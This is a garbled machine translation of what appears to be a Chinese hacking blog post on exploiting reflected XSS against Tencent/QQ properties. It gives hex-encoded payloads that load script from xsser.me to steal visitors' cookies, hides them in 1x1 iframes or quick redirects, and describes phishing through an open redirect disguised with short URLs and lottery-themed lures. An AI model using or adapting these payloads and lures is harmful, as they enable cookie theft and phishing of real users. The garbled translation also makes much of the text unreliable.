A ramble on reflection XSS using. txt

The evening is bored, did not hit the draft, thought of where, writes to where, make a look.
First hit the author: y35u 1, the reflection of XSS large.
Reflection XSS is a lot more than FLASHXSS and storage XSS.
So the larger the user base of the site, the greater the power of reflection XSS because more, so the users will be greatly increased.
Moreover, the storage of the seal will be faster, and the reflection of the relatively non-timely closure.
In XSS, it is generally believed that storage is the most harmful, it is to see who you x if you want x administrator, that is certainly the danger of storage if you want X more people (with your same identity of visitors), stored xss can write worms, the effect is obvious, reflection can also, the effect is second.
If you want X to specify the person (the same as your visitors), the effect of the same read the http://www.wooyun.org/bugs/wooyun-2010-011192 2, how to find reflection XSS. Typical tools, such as Http://www.3hack.com/tools/DOMinatorPro%E7%A0%B4%E8%A7%A3%E7%89%88.txt http://www.3hack.com/paper/ Dominator%e4%bd%bf%e7%94%a8%e5%ae%9e%e4%be%8b-%e8%a7%86%e9%a2%91.txt Of course there are more, such as Burpsuite's XSSSACN plugin, there are some personal writing professional tools

.
So reflection XSS is called as long as the artifact in the hand, not afraid of XSS no more.




A cow said, without tools, a day to find the TX can find dozens of. So it's scary to have technology.
3, how to use reflective XSS "seamless".

The difference between reflection and storage is where we need to know that if we can compensate for the imperfections of the reflection, we'll be able to deal with it.
0x1, the browser factor, the browser's impact on reflection XSS is the biggest solution: Bypass a variety of browsers, which can be done.
0x2, the reflected URL is easily seen by discerning eye to solve: using the IFRAME framework, URL jump 4. Can you see the actual case? A. http://ctc.qzs.qq.com/qzone/v6/newlimit/index.html?s=1&uin=114967639)); " > tags add <script> var exp= '%68%74%74%70%3a%2f% 2f%63%74%63%2e%71%7a%73%2e%71%71%2e%63%6f%6d%2f%71%7a%6f%6e%65%2f%76%36%2f%6e%65%77%6c%69%6d%69%74%2f%69%6e%64 %65%78%2e%68%74%6d%6c%3f%73%3d%31%26%75%69%6e%3d%31%31%34%39%36%37%36%33%39%29%29%3b%22%3e%3c%69%6d%67%20%73% 72%63%3d%6c%20%6f%6e%65%72%72%6f%72%3d%65%3d%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74 %28%27%73%63%72%69%70%74%27%29%3b%65%2e%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2c%27%2f%2f%78% 73%73%65%72%2e%6d%65%2f%39%4e%6b%42%77%79%3f%31%33%35%33%30%36%35%34%31%37%27%29 ';//above exp full Rul code urllll = UNESCAPE (exp);
Decode var e=document.createelement (' iframe ');
e.width=1;
E.height=1;
E.setattribute (' src ', urllll);
Document.body.appendChild (e); </script> User experience: wooyun.org, caught cookies transmitted to Xssserme A-2 if the IFRAME is not allowed. That is, after the IFRAME, will jump out of the SRC page, it is not exposed then jump bar exp:http://ctc.qzs.qq.com/qzone/v6/newlimit/index.html?s=1&uin=114967639)) ;" >&jump=http%3a%2f%2fuser.qzone.qq.com%2f114967639


A sentence of Document.body.appendChild (e); >&jump=http%3a%2f%2fuser.qzone.qq.com%2f114967639 This you can write into the xsser.me JS inside, so the URL is the same as the first exp. The function is to jump to the normal page <script> var exp= '%68%74%74%70%3a%2f%2f%63%74%63%2e%71%7a%73%2e%71%71%2e%63%6f%6d%2f%71%7a%6f% 6e%65%2f%76%36%2f%6e%65%77%6c%69%6d%69%74%2f%69%6e%64%65%78%2e%68%74%6d%6c%3f%73%3d%31%26%75%69%6e%3d%31%31%34 %39%36%37%36%33%39%29%29%3b%22%3e%3c%69%6d%67%20%73%72%63%3d%6c%20%6f%6e%65%72%72%6f%72%3d%65%3d%64%6f%63%75% 6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%27%73%63%72%69%70%74%27%29%3b%65%2e%73%65%74%41%74%74 %72%69%62%75%74%65%28%27%73%72%63%27%2c%27%2f%2f%78%73%73%65%72%2e%6d%65%2f%39%4e%6b%42%77%79%3f%31%33%35%33%30%36%35%34%31%37%27%29 '; urllll = unescape (exp);
Decode window.location.href=urllll;//User experience: wooyun.org, jump to exp address, and then jump to the normal page, because the exp address and the normal page address change is the most behind, jump quickly, not technical type, do not see, B. If EXP is not universal, is to have different exp for IE9,FF is also very simple, ie8,ie9,chrome bypass such articles a lot, you can see that we have to do is IFRAME exp.js//Exp.js is responsible for judging the browser version, and then according to different version, the output of different exp, against the attack with the above a case, more than a section of JS code, that is, to determine the browser version to write a few exp, as a case of the form, for the main browser ie8.ie9. Firefox chrome.other (e.g. 360. Sogou,

are used by the IE kernel) exp.js written in general, after you have other exp, just replace exp, you do not have to write code, once and for all.

I wrote to a friend to see, they say very rotten, it is not bright, embarrassing. C. If there is a perfect iframe XSS, the fishing success rate is quite high http://baoxian.tenpay.com/zhongmin.shtml?redirecturl=http://xj.hk/tenpay/can put the HTTP

://xj.hk/tenpay/encrypted with the short address of the TX Weibo.

Of course, this XSS can also go to use JavaScript to catch cookies, but I think fishing is more harmful. At that time test, dual-use type, if you are afraid of opponents are not fooled, you can learn from case A to catch cookies, if you think the opponent is small white this fishing success rate is quite high D. You have to catch cookies and fish (too hard) so there is a conflict,

Because the main point of the cookie is that the current URL is another site, only the framework of the TX address and fishing, you must be the URL is the TX address, only trusted for the fish and bra can not have both, if all is pure small white, url is long, but can try to do it is very simple, such as case a In Xsserme JS plus top.document.body.innerhtml= "<iframe width=100% height=100% frameborder=0 scrolling=no Style=position:absolute;left:0;top:0 src=http://xj.hk/tenpay/></iframe> ";

Practice with A-2, such as, with the reverse, for example, the title of Writing, TX lottery, Hundred won, we quickly go to the wooyun.org with TX short URL encryption, or direct tweet it ...


Access to the short URL, will be two-level jump to the XSS address this time, the execution of Xssserme JS, first grabbed the cookies, and rewrite the page ...  Well, think about it for a while, and write it again.